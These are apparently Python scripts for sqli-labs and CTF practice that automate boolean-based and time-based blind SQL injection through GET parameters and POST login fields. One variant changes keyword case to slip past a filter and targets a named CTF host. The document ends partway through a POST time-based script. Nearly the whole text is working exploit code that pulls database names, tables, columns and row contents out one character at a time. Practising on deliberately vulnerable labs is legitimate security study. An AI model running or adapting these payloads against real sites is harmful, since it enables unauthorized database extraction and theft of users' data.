BlindBool_get
import requests
from optparse import OptionParser
import threading
#存放变量
DBName = ""
DBTables = []
DBColumns = []
DBData = {}
flag = 'You are in'
#设置重连次数以及将连接改为短连接
#防止因为HTTP连接数过多导致的MAX retries exceeded with url问题
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False
def GetDBName(url):
#引用全局变量DBName,用来存放数据库名
global DBName
print('[*]开始获取数据库名长度')
#保存数据库名长度的变量
DBNameLen = 0
#检查数据库名的长度的payload
payload1 = "' and if(length(database())={0},1,0) --+"
targetUrl = url + payload1
for DBNameLen in range(1,99):
res = conn.get(targetUrl.format(DBNameLen))
if flag in res.content.decode("utf-8"):
print("[*] 数据库名长度:" + str(DBNameLen))
break
print("[*]开始获取数据库名")
payload1 = "' and if(ascii(substr(database(),{0},1))={1},1,0) --+"
targetUrl = url+payload1
for a in range(1,DBNameLen+1):
for item in range(33,128):
res = conn.get(targetUrl.format(a,item))
if flag in res.content.decode('utf-8'):
DBName += chr(item)
print("[*]"+DBName)
break
def GetDBTables(url,dbname):
global DBTables
DBTableCount = 0
print("[*] 开始获取{0}数据库表数量:".format(dbname))
#获取表名数量的payload
payload2 = "' and if((select count(*)table_name from information_schema.tables where table_schema='{0}')={1},1,0) --+"
targetUrl = url + payload2
for DBTableCount in range(1,100):
res = conn.get(targetUrl.format(dbname,DBTableCount))
if flag in res.content.decode("utf-8"):
print("[*]{0}数据库中表的数量为:{1}".format(dbname,DBTableCount))
break
print("[*] 开始获取{0}数据库中的表名".format(dbname))
tableLen = 0
for a in range(0,DBTableCount):
print("[*] 正在获取第{0}个表名".format(a+1))
#获取当前表名的长度
for tableLen in range(1,99):
payload2 = "' and if((select LENGTH(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},1,0) --+"
targetUrl = url + payload2
res = conn.get(targetUrl.format(dbname,a,tableLen))
if flag in res.content.decode("utf-8"):
break
#开始获取表名
#临时存放当前表名的变量
table = ""
#b表示当前表名猜的位置
for b in range(1,tableLen+1):
payload2 = "' and if(ascii(substr((select table_name from information_schema.tables where table_schema = '{0}' limit {1},1),{2},1))={3},1,0) --+"
targetUrl = url + payload2
for c in range(33,128):
res = conn.get(targetUrl.format(dbname,a,b,c))
if flag in res.content.decode('utf-8'):
table += chr(c)
print(table)
break
#把获取到的表名加入DBTables
DBTables.append(table)
#清空table,用来获取下一个表名
table = ''
def GetDBColumns(url,dbname,dbtable):
global DBColumns
DBColumnCount = 0
#获取字段数量的payload
print("[-]开始获取{0}数据表的字段数:".format(dbtable))
for DBColumnCount in range(0,99):
payload3 = "' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},1,0) --+"
targetUrl = url + payload3
res = conn.get(targetUrl.format(dbname,dbtable,DBColumnCount))
if flag in res.content.decode('utf-8'):
print("[*] {0}数据库中的{1}表的字段个数为{2}个:".format(dbname,dbtable,DBColumnCount))
break
#得到字段数量后开始获取字段名
columns = ''
for a in range(0,DBColumnCount):
print("正在获取第{0}个字段的长度和名称:".format(a+1))
#获取长度
for columnLen in range(0,99):
payload3 = "' and if((select LENGTH(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},1,0) --+"
targetUrl = url + payload3
res = conn.get(targetUrl.format(dbname,dbtable,a,columnLen))
if flag in res.content.decode('utf-8'):
break
#b标志字段中位置
for b in range(0,columnLen+1):
payload3 = "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},1,0) --+"
targetUrl = url + payload3
for c in range(33,128):
res = conn.get(targetUrl.format(dbname,dbtable,a,b,c))
if flag in res.content.decode('utf-8'):
columns += chr(c)
print(columns)
break
#获取到的字段放入DBColumns
DBColumns.append(columns)
columns = ''
# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
global DBData
# 先获取字段数据数量
DBDataCount = 0
print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
for DBDataCount in range(99):
payload = "'and if ((select count({0}) from {1})={2},1,0) --+"
targetUrl = url + payload
res = conn.get(targetUrl.format(dbcolumn, dbtable, DBDataCount))
if flag in res.content.decode("utf-8"):
print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
break
for a in range(0, DBDataCount):
print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))
#先获取这个数据的长度
dataLen = 0
for dataLen in range(99):
payload = "'and if ((select length({0}) from {1} limit {2},1)={3},1,0) --+"
targetUrl = url + payload
res = conn.get(targetUrl.format(dbcolumn, dbtable, a, dataLen))
if flag in res.content.decode("utf-8"):
print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))
break
#临时存放数据内容变量
data = ""
#开始获取数据的具体内容
#b表示当前数据内容猜解的位置
for b in range(1, dataLen+1):
for c in range(33, 128):
payload = "'and if (ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},1,0) --+"
targetUrl = url + payload
res = conn.get(targetUrl.format(dbcolumn, dbtable, a, b, c))
if flag in res.content.decode("utf-8"):
data += chr(c)
print(data)
break
#放到以字段名为键,值为列表的字典中存放
DBData.setdefault(dbcolumn,[]).append(data)
print(DBData)
#把data清空来,继续获取下一个数据
data = ""
# 盲注主函数
def StartSqli(url):
GetDBName(url)
print("[+]当前数据库名:{0}".format(DBName))
GetDBTables(url,DBName)
print("[+]数据库{0}的表如下:".format(DBName))
for item in range(len(DBTables)):
print("(" + str(item + 1) + ")" + DBTables[item])
tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
GetDBColumns(url,DBName,DBTables[tableIndex])
while True:
print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
for item in range(len(DBColumns)):
print("(" + str(item + 1) + ")" + DBColumns[item])
columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1
if(columnIndex == -1):
break
else:
GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])
if __name__ == "__main__":
try:
usage = "./BlindBool_get.py -u url"
parser = OptionParser(usage)
parser.add_option('-u',type='string',dest='url',default='http://localhost/Less-8/?id=1',help='设置目标url')
options,args=parser.parse_args()
url = options.url
# StartSqli(options.url)
threadSQL = threading.Thread(target=StartSqli,args=(url,))
threadSQL.start()
except KeyboardInterrupt:
print('Interrupted by keyboard inputting!!!')
BlindBool_get-修改过的(大小写过滤)
import requests
from optparse import OptionParser
import threading
import time
# 存放变量
DBName = ""
DBTables = []
DBColumns = []
DBData = {}
flag = 'points'
# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的MAX retries exceeded with url问题
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False
def GetDBName(url):
# 引用全局变量DBName,用来存放数据库名
global DBName
print('[*]开始获取数据库名长度')
# 保存数据库名长度的变量
DBNameLen = 0
# 检查数据库名的长度的payload
payload1 = "' AND if(length(database())={0},1,0) --+"
targetUrl = url + payload1
for DBNameLen in range(1, 99):
time.sleep(0.2)
res = conn.get(targetUrl.format(DBNameLen))
if flag in res.content.decode("utf-8"):
print("[*] 数据库名长度:" + str(DBNameLen))
break
print("[*]开始获取数据库名")
payload1 = "' AND if(Ascii(Substr(Database(),{0},1))={1},1,0) --+"
targetUrl = url + payload1
for a in range(1, DBNameLen + 1):
for item in range(33, 128):
time.sleep(0.2)
res = conn.get(targetUrl.format(a, item))
if flag in res.content.decode('utf-8'):
DBName += chr(item)
print("[*]" + DBName)
break
def GetDBTables(url, dbname):
global DBTables
DBTableCount = 0
print("[*] 开始获取{0}数据库表数量:".format(dbname))
# 获取表名数量的payload
payload2 = "' And If((Select Count(*)Table_Name From InfOrmation_Schema.Tables Where Table_Schema='{0}')={1},1,0) --+"
targetUrl = url + payload2
for DBTableCount in range(1, 100):
time.sleep(0.2)
res = conn.get(targetUrl.format(dbname, DBTableCount))
if flag in res.content.decode("utf-8"):
print("[*]{0}数据库中表的数量为:{1}".format(dbname, DBTableCount))
break
print("[*] 开始获取{0}数据库中的表名".format(dbname))
tableLen = 0
for a in range(0, DBTableCount):
print("[*] 正在获取第{0}个表名".format(a + 1))
# 获取当前表名的长度
for tableLen in range(1, 99):
time.sleep(0.2)
payload2 = "' And if((Select LENGTH(Table_name) From infOrmation_schema.tables Where table_schema='{0}' limit {1},1)={2},1,0) --+"
targetUrl = url + payload2
res = conn.get(targetUrl.format(dbname, a, tableLen))
if flag in res.content.decode("utf-8"):
break
# 开始获取表名
# 临时存放当前表名的变量
table = ""
# b表示当前表名猜的位置
for b in range(1, tableLen + 1):
payload2 = "' And if(Ascii(Substr((Select Table_name From infOrmation_schema.tables Where Table_schema = '{0}' Limit {1},1),{2},1))={3},1,0) --+"
targetUrl = url + payload2
for c in range(33, 128):
time.sleep(0.2)
res = conn.get(targetUrl.format(dbname, a, b, c))
if flag in res.content.decode('utf-8'):
table += chr(c)
print(table)
break
# 把获取到的表名加入DBTables
DBTables.append(table)
# 清空table,用来获取下一个表名
table = ''
def GetDBColumns(url, dbname, dbtable):
global DBColumns
DBColumnCount = 0
# 获取字段数量的payload
print("[-]开始获取{0}数据表的字段数:".format(dbtable))
for DBColumnCount in range(0, 99):
payload3 = "' AND IF((SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='{0}' AND TABLE_NAME='{1}')={2},1,0) --+"
targetUrl = url + payload3
time.sleep(0.2)
res = conn.get(targetUrl.format(dbname, dbtable, DBColumnCount))
if flag in res.content.decode('utf-8'):
print("[*] {0}数据库中的{1}表的字段个数为{2}个:".format(dbname, dbtable, DBColumnCount))
break
# 得到字段数量后开始获取字段名
columns = ''
for a in range(0, DBColumnCount):
print("正在获取第{0}个字段的长度和名称:".format(a + 1))
# 获取长度
for columnLen in range(0, 99):
time.sleep(0.2)
payload3 = "' AND IF((SELECT LENGTH(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='{0}' AND TABLE_NAME='{1}' LIMIT {2},1)={3},1,0) --+"
targetUrl = url + payload3
res = conn.get(targetUrl.format(dbname, dbtable, a, columnLen))
if flag in res.content.decode('utf-8'):
break
# b标志字段中位置
for b in range(0, columnLen + 1):
payload3 = "' AND IF(ASCII(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='{0}' AND TABLE_NAME='{1}' LIMIT {2},1),{3},1))={4},1,0) --+"
targetUrl = url + payload3
for c in range(33, 128):
time.sleep(0.2)
res = conn.get(targetUrl.format(dbname, dbtable, a, b, c))
if flag in res.content.decode('utf-8'):
columns += chr(c)
print(columns)
break
# 获取到的字段放入DBColumns
DBColumns.append(columns)
columns = ''
# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
global DBData
# 先获取字段数据数量
DBDataCount = 0
print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
for DBDataCount in range(99):
time.sleep(0.2)
payload = "'AND IF ((SELECT COUNT({0}) FROM {1})={2},1,0) --+"
targetUrl = url + payload
res = conn.get(targetUrl.format(dbcolumn, dbtable, DBDataCount))
if flag in res.content.decode("utf-8"):
print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
break
for a in range(0, DBDataCount):
print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a + 1))
# 先获取这个数据的长度
dataLen = 0
for dataLen in range(99):
time.sleep(0.2)
payload = "'AND IF ((SELECT LENGTH({0}) FROM {1} LIMIT {2},1)={3},1,0) --+"
targetUrl = url + payload
res = conn.get(targetUrl.format(dbcolumn, dbtable, a, dataLen))
if flag in res.content.decode("utf-8"):
print("[-]第{0}个数据长度为:{1}".format(a + 1, dataLen))
break
# 临时存放数据内容变量
data = ""
# 开始获取数据的具体内容
# b表示当前数据内容猜解的位置
for b in range(1, dataLen + 1):
for c in range(33, 128):
time.sleep(0.2)
payload = "'AND IF (ASCII(SUBSTR((SELECT {0} FROM {1} LIMIT {2},1),{3},1))={4},1,0) --+"
targetUrl = url + payload
res = conn.get(targetUrl.format(dbcolumn, dbtable, a, b, c))
if flag in res.content.decode("utf-8"):
data += chr(c)
print(data)
break
# 放到以字段名为键,值为列表的字典中存放
DBData.setdefault(dbcolumn, []).append(data)
print(DBData)
# 把data清空来,继续获取下一个数据
data = ""
# 盲注主函数
def StartSqli(url):
GetDBName(url)
print("[+]当前数据库名:{0}".format(DBName))
GetDBTables(url, DBName)
print("[+]数据库{0}的表如下:".format(DBName))
for item in range(len(DBTables)):
print("(" + str(item + 1) + ")" + DBTables[item])
tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
GetDBColumns(url, DBName, DBTables[tableIndex])
while True:
print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
for item in range(len(DBColumns)):
print("(" + str(item + 1) + ")" + DBColumns[item])
columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1
if (columnIndex == -1):
break
else:
GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])
if __name__ == "__main__":
try:
usage = "./BlindBool_get.py -u url"
parser = OptionParser(usage)
parser.add_option('-u', type='string', dest='url',
default='http://ad508a79-8b81-4227-bc6f-37d173ce8209.node4.buuoj.cn:81/?id=TMP0919',
help='设置目标url')
options, args = parser.parse_args()
url = options.url
# StartSqli(options.url)
threadSQL = threading.Thread(target=StartSqli, args=(url,))
threadSQL.start()
except KeyboardInterrupt:
print('Interrupted by keyboard inputting!!!')
修改的地方:
payload
flag(页面对应的字符)
添加了time.sleep(0.2)
default
修改时要注意间隔
BlindBool_post
import requests
from optparse import OptionParser
import threading
#存放变量
DBName = ""
DBTables = []
DBColumns = []
DBData = {}
flag = 'flag'
#设置重连次数以及将连接改为短连接
#防止因为HTTP连接数过多导致的MAX retries exceeded with url问题
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False
def GetDBName(url):
#引用全局变量DBName,用来存放数据库名
global DBName
print('[*]开始获取数据库名长度')
#保存数据库名长度的变量
DBNameLen = 0
#检查数据库名的长度的payload
# payload1 = "' and if(length(database())={0},1,0) #"
for DBNameLen in range(1,99):
payload = "admin' and if(length(database())="+str(DBNameLen)+",1,0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
if flag in res.content.decode("utf-8"):
print("[*] 数据库名长度:" + str(DBNameLen))
break
print("[*]开始获取数据库名")
for a in range(1,DBNameLen+1):
for item in range(33,128):
payload = "admin' and if(ascii(substr(database(),"+str(a)+",1))="+str(item)+",1,0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
if flag in res.content.decode('utf-8'):
DBName += chr(item)
print("[*]"+DBName)
break
def GetDBTables(url,dbname):
global DBTables
DBTableCount = 0
print("[*] 开始获取{0}数据库表数量:".format(dbname))
#获取表名数量的payload
# payload2 = "' and if((select count(*)table_name from information_schema.tables where table_schema='{0}')={1},1,0) #"
for DBTableCount in range(1,100):
payload = "admin' and if((select count(*)table_name from information_schema.tables where table_schema='"+dbname+"')="+str(DBTableCount)+",1,0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
if flag in res.content.decode("utf-8"):
print("[*]{0}数据库中表的数量为:{1}".format(dbname,DBTableCount))
break
print("[*] 开始获取{0}数据库中的表名".format(dbname))
tableLen = 0
for a in range(0,DBTableCount):
print("[*] 正在获取第{0}个表名".format(a+1))
#获取当前表名的长度
for tableLen in range(1,99):
payload = "admin' and if((select LENGTH(table_name) from information_schema.tables where table_schema='"+dbname+"' limit "+str(a)+",1)="+str(tableLen)+",1,0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
if flag in res.content.decode("utf-8"):
break
#开始获取表名
#临时存放当前表名的变量
table = ""
#b表示当前表名猜的位置
for b in range(1,tableLen+1):
for c in range(33,128):
payload = "admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema = '"+dbname+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",1,0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
if flag in res.content.decode('utf-8'):
table += chr(c)
print(table)
break
#把获取到的表名加入DBTables
DBTables.append(table)
#清空table,用来获取下一个表名
table = ''
def GetDBColumns(url,dbname,dbtable):
global DBColumns
DBColumnCount = 0
#获取字段数量的payload
print("[-]开始获取{0}数据表的字段数:".format(dbtable))
for DBColumnCount in range(0,99):
payload = "admin' and if((select count(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"')="+str(DBColumnCount)+",1,0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
if flag in res.content.decode('utf-8'):
print("[*] {0}数据库中的{1}表的字段个数为{2}个:".format(dbname,dbtable,DBColumnCount))
break
#得到字段数量后开始获取字段名
columns = ''
for a in range(0,DBColumnCount):
print("正在获取第{0}个字段的长度和名称:".format(a+1))
#获取长度
for columnLen in range(0,99):
payload = "admin' and if((select LENGTH(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1)="+str(columnLen)+",1,0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
if flag in res.content.decode('utf-8'):
break
#b标志字段中位置
for b in range(0,columnLen+1):
for c in range(33,128):
payload = "admin' and if(ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",1,0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
if flag in res.content.decode('utf-8'):
columns += chr(c)
print(columns)
break
#获取到的字段放入DBColumns
DBColumns.append(columns)
columns = ''
# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
global DBData
# 先获取字段数据数量
DBDataCount = 0
print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
for DBDataCount in range(99):
payload = "admin' and if ((select count("+dbcolumn+") from "+dbtable+")="+str(DBDataCount)+",1,0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
if flag in res.content.decode("utf-8"):
print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
break
for a in range(0, DBDataCount):
print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))
#先获取这个数据的长度
dataLen = 0
for dataLen in range(99):
payload = "admin' and if ((select length("+dbcolumn+") from "+dbtable+" limit "+str(a)+",1)="+str(dataLen)+",1,0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
if flag in res.content.decode("utf-8"):
print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))
break
#临时存放数据内容变量
data1 = ""
#开始获取数据的具体内容
#b表示当前数据内容猜解的位置
for b in range(1, dataLen+1):
for c in range(33, 128):
payload = "admin' and if (ascii(substr((select "+dbcolumn+" from "+dbtable+" limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",1,0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
if flag in res.content.decode("utf-8"):
data1 += chr(c)
print(data1)
break
#放到以字段名为键,值为列表的字典中存放
DBData.setdefault(dbcolumn,[]).append(data1)
print(DBData)
#把data清空来,继续获取下一个数据
data1 = ""
# 盲注主函数
def StartSqli(url):
GetDBName(url)
print("[+]当前数据库名:{0}".format(DBName))
GetDBTables(url,DBName)
print("[+]数据库{0}的表如下:".format(DBName))
for item in range(len(DBTables)):
print("(" + str(item + 1) + ")" + DBTables[item])
tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
GetDBColumns(url,DBName,DBTables[tableIndex])
while True:
print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
for item in range(len(DBColumns)):
print("(" + str(item + 1) + ")" + DBColumns[item])
columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1
if(columnIndex == -1):
break
else:
GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])
if __name__ == "__main__":
try:
usage = "./BlindBool_post.py -u url"
parser = OptionParser(usage)
parser.add_option('-u',type='string',dest='url',default='http://localhost/Less-15',help='设置目标url')
options,args=parser.parse_args()
url = options.url
# StartSqli(options.url)
threadSQL = threading.Thread(target=StartSqli,args=(url,))
threadSQL.start()
except KeyboardInterrupt:
print('Interrupted by keyboard inputting!!!')
BlindTime_get
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import requests
from optparse import OptionParser
import time
import threading
# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}
# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False
# 盲注主函数
def StartSqli(url):
GetDBName(url)
print("[+]当前数据库名:{0}".format(DBName))
GetDBTables(url,DBName)
print("[+]数据库{0}的表如下:".format(DBName))
for item in range(len(DBTables)):
print("(" + str(item + 1) + ")" + DBTables[item])
tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
GetDBColumns(url,DBName,DBTables[tableIndex])
while True:
print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
for item in range(len(DBColumns)):
print("(" + str(item + 1) + ")" + DBColumns[item])
columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1
if(columnIndex == -1):
break
else:
GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])
# 获取数据库名函数
def GetDBName(url):
# 引用全局变量DBName,用来存放网页当前使用的数据库名
global DBName
print("[-]开始获取数据库名长度")
# 保存数据库名长度变量
DBNameLen = 0
# 用于检查数据库名长度的payload
payload = "' and if(length(database())={0},sleep(5),0) --+"
# 把URL和payload进行拼接得到最终的请求URL
targetUrl = url + payload
# 用for循环来遍历请求,得到数据库名长度
for DBNameLen in range(1, 99):
# 开始时间
timeStart = time.time()
# 开始访问
res = conn.get(targetUrl.format(DBNameLen))
# 结束时间
timeEnd = time.time()
# 判断时间差
if timeEnd - timeStart >= 5:
print("[+]数据库名长度:" + str(DBNameLen))
break
print("[-]开始获取数据库名")
payload = "' and if(ascii(substr(database(),{0},1))={1},sleep(5),0)--+"
targetUrl = url + payload
# a表示substr()函数的截取起始位置
for a in range(1, DBNameLen+1):
# b表示33~127位ASCII中可显示字符
for b in range(33, 128):
timeStart = time.time()
res = conn.get(targetUrl.format(a,b))
timeEnd = time.time()
if timeEnd - timeStart >= 5:
DBName += chr(b)
print("[-]"+ DBName)
break
#获取数据库表函数
def GetDBTables(url, dbname):
global DBTables
#存放数据库表数量的变量
DBTableCount = 0
print("[-]开始获取{0}数据库表数量:".format(dbname))
#获取数据库表数量的payload
payload = "' and if((select count(table_name) from information_schema.tables where table_schema='{0}' )={1},sleep(5),0) --+"
targetUrl = url + payload
#开始遍历获取数据库表的数量
for DBTableCount in range(1, 99):
timeStart = time.time()
res = conn.get(targetUrl.format(dbname, DBTableCount))
timeEnd = time.time()
if timeEnd - timeStart >= 5:
print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))
break
print("[-]开始获取{0}数据库的表".format(dbname))
# 遍历表名时临时存放表名长度变量
tableLen = 0
# a表示当前正在获取表的索引
for a in range(0,DBTableCount):
print("[-]正在获取第{0}个表名".format(a+1))
# 先获取当前表名的长度
for tableLen in range(1, 99):
payload = "' and if((select length(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},sleep(5),0) --+"
targetUrl = url + payload
timeStart = time.time()
res = conn.get(targetUrl.format(dbname, a, tableLen))
timeEnd = time.time()
if timeEnd - timeStart >= 5:
break
# 开始获取表名
# 临时存放当前表名的变量
table = ""
# b表示当前表名猜解的位置
for b in range(1, tableLen+1):
payload = "' and if(ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1))={3},sleep(5),0)--+"
targetUrl = url + payload
# c表示33~127位ASCII中可显示字符
for c in range(33, 128):
timeStart = time.time()
res = conn.get(targetUrl.format(dbname, a, b, c))
timeEnd = time.time()
if timeEnd - timeStart >= 5:
table += chr(c)
print(table)
break
#把获取到的名加入到DBTables
DBTables.append(table)
#清空table,用来继续获取下一个表名
table = ""
# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):
global DBColumns
# 存放字段数量的变量
DBColumnCount = 0
print("[-]开始获取{0}数据表的字段数:".format(dbtable))
for DBColumnCount in range(99):
payload = "' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},sleep(5),0) --+"
targetUrl = url + payload
timeStart = time.time()
res = conn.get(targetUrl.format(dbname, dbtable, DBColumnCount))
timeEnd = time.time()
if timeEnd - timeStart >= 5:
print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))
break
# 开始获取字段的名称
# 保存字段名的临时变量
column = ""
# a表示当前获取字段的索引
for a in range(0, DBColumnCount):
print("[-]正在获取第{0}个字段名".format(a+1))
# 先获取字段的长度
for columnLen in range(99):
payload = "' and if((select length(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},sleep(5),0) --+"
targetUrl = url + payload
timeStart = time.time()
res = conn.get(targetUrl.format(dbname, dbtable, a, columnLen))
timeEnd = time.time()
if timeEnd - timeStart >= 5:
break
# b表示当前字段名猜解的位置
for b in range(1, columnLen+1):
payload = "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},sleep(5),0) --+"
targetUrl = url + payload
# c表示33~127位ASCII中可显示字符
for c in range(33, 128):
timeStart = time.time()
res = conn.get(targetUrl.format(dbname, dbtable, a, b, c))
timeEnd = time.time()
if timeEnd - timeStart >= 5:
column += chr(c)
print(column)
break
# 把获取到的名加入到DBColumns
DBColumns.append(column)
#清空column,用来继续获取下一个字段名
column = ""
# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
global DBData
# 先获取字段数据数量
DBDataCount = 0
print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
for DBDataCount in range(99):
payload = "' and if((select count({0}) from {1})={2},sleep(5),0) --+"
targetUrl = url + payload
timeStart = time.time()
res = conn.get(targetUrl.format(dbcolumn, dbtable, DBDataCount))
timeEnd = time.time()
if timeEnd - timeStart >= 5:
print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
break
for a in range(0, DBDataCount):
print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))
#先获取这个数据的长度
dataLen = 0
for dataLen in range(99):
payload = "'and if((select length({0}) from {1} limit {2},1)={3},sleep(5),0) --+"
targetUrl = url + payload
timeStart = time.time()
res = conn.get(targetUrl.format(dbcolumn, dbtable, a, dataLen))
timeEnd = time.time()
if timeEnd - timeStart >= 5:
print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))
break
#临时存放数据内容变量
data = ""
#开始获取数据的具体内容
#b表示当前数据内容猜解的位置
for b in range(1, dataLen+1):
for c in range(33, 128):
payload = "' and if(ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},sleep(5),0) --+"
targetUrl = url + payload
timeStart = time.time()
res = conn.get(targetUrl.format(dbcolumn, dbtable, a, b, c))
timeEnd = time.time()
if timeEnd - timeStart >= 5:
data += chr(c)
print(data)
break
#放到以字段名为键,值为列表的字典中存放
DBData.setdefault(dbcolumn,[]).append(data)
print(DBData)
#把data清空来,继续获取下一个数据
data = ""
if __name__ == '__main__':
try:
usage = "./BlindTime_get.py -u url"
parser = OptionParser(usage)
# 目标URL参数-u
parser.add_option('-u', '--url', dest='url',default='http://localhost/Less-9/?id=1', type='string',help='target URL')
options, args = parser.parse_args()
url = options.url
threadSQL = threading.Thread(target=StartSqli,args=(url,))
threadSQL.start()
except KeyboardInterrupt:
print("Interrupted by keyboard inputting!!!")
BlindTime_post
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import requests
from optparse import OptionParser
import time
import threading
# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}
# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False
# 获取数据库名函数
def GetDBName(url):
# 引用全局变量DBName,用来存放网页当前使用的数据库名
global DBName
print("[-]开始获取数据库名长度")
# 保存数据库名长度变量
DBNameLen = 0
# 用for循环来遍历请求,得到数据库名长度
for DBNameLen in range(1, 99):
# 开始时间
timeStart = time.time()
payload = "admin' and if(length(database())="+str(DBNameLen)+",sleep(5),0) #"
# "admin' and if(length(database())=8,sleep(5),0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
# 结束时间
timeEnd = time.time()
# 判断时间差
if timeEnd - timeStart >= 5:
print("[+]数据库名长度:" + str(DBNameLen))
break
print("[-]开始获取数据库名")
# a表示substr()函数的截取起始位置
for a in range(1, DBNameLen+1):
# b表示33~127位ASCII中可显示字符
for b in range(33, 128):
timeStart = time.time()
payload = "admin' and if(ascii(substr(database(),"+str(a)+",1))="+str(b)+",sleep(5),0)#"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
DBName += chr(b)
print("[-]"+ DBName)
break
